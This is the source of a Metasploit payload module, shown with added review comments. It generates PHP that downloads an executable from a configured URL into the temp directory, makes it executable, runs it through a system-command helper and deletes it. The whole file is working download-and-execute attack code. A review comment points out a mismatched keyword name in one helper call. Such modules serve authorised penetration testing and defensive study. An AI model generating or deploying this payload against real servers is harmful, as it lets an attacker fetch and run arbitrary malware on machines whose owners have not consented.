GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/php/download_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # The emitted PHP embeds random identifiers and the URL option, so no
  # fixed payload size is cached.
  CachedSize = :dynamic

  include Msf::Payload::Php
  include Msf::Payload::Single

  # Sets up module metadata and the payload's single option.
  #
  # @param info [Hash] module info merged with the defaults below
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'PHP Executable Download and Execute',
      'Description' => 'Download an EXE from an HTTP URL and execute it',
      'Author' => [ 'egypt' ],
      'License' => BSD_LICENSE,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Privileged' => false
    ))

    # EXITFUNC is not supported :/
    deregister_options('EXITFUNC')

    # Register command execution options.
    # URL is interpolated verbatim into a double-quoted PHP string in
    # php_exec_file with no escaping applied, hence "pre-encoded": quotes or
    # PHP escape sequences in the value are not neutralised here.
    register_options(
      [
        OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
      ])
  end

  # Builds the PHP source that forms the payload body.
  #
  # What the generated PHP does, as written below (relevant for anyone
  # reviewing logs or a recovered sample):
  # * defines a sys_get_temp_dir() polyfill when that function is missing:
  #   it checks the TMP, TMPDIR and TEMP environment variables, otherwise
  #   creates and deletes a tempnam() file and returns that file's directory;
  # * opens datastore['URL'] with fopen() and copies it in 8192-byte reads to
  #   <tempdir>/<4-11 random alpha chars>.exe, exiting via die() with no
  #   message if either fopen() fails;
  # * chmod()s the file to 0777, passes its path to php_system_block as the
  #   command, then unlink()s it.
  #
  # @return [String] uncompressed PHP source (the compress call is commented out)
  def php_exec_file
    # rand(8) + 4 yields a 4..11 character name with no fixed prefix or suffix.
    exename = Rex::Text.rand_text_alpha(rand(8) + 4)
    # PHP variable name handed to php_preamble for its disabled-function list.
    # NOTE(review): the php_system_block call below spells the keyword
    # disabled_varnam: while the php_preamble call uses disabled_varname: —
    # confirm the helper reads the key this call actually passes.
    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
    # NOTE(review): fopen() on an http URL presumably depends on PHP's URL
    # stream wrappers being enabled on the target; nothing here checks that.
    # The heredoc uses <<-, which preserves leading whitespace, so its body is
    # left unindented to keep the emitted PHP byte-identical.
    shell = <<-END_OF_PHP_CODE
#{php_preamble(disabled_varname: dis)}
if (!function_exists('sys_get_temp_dir')) {
function sys_get_temp_dir() {
if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }
if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }
$tempfile=tempnam(uniqid(rand(),TRUE),'');
if (file_exists($tempfile)) {
@unlink($tempfile);
return realpath(dirname($tempfile));
}
return null;
}
}
$fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";
$fd_in = fopen("#{datastore['URL']}", "rb");
if ($fd_in === false) { die(); }
$fd_out = fopen($fname, "wb");
if ($fd_out === false) { die(); }
while (!feof($fd_in)) {
fwrite($fd_out, fread($fd_in, 8192));
}
fclose($fd_in);
fclose($fd_out);
chmod($fname, 0777);
$c = $fname;
#{php_system_block(cmd_varname: "$c", disabled_varnam: dis)}
@unlink($fname);
    END_OF_PHP_CODE

    #return Rex::Text.compress(shell)
    return shell
  end

  #
  # Constructs the payload
  #
  # @param _opts [Hash] unused
  # @return [String] the PHP source produced by php_exec_file
  def generate(_opts = {})
    return php_exec_file
  end
end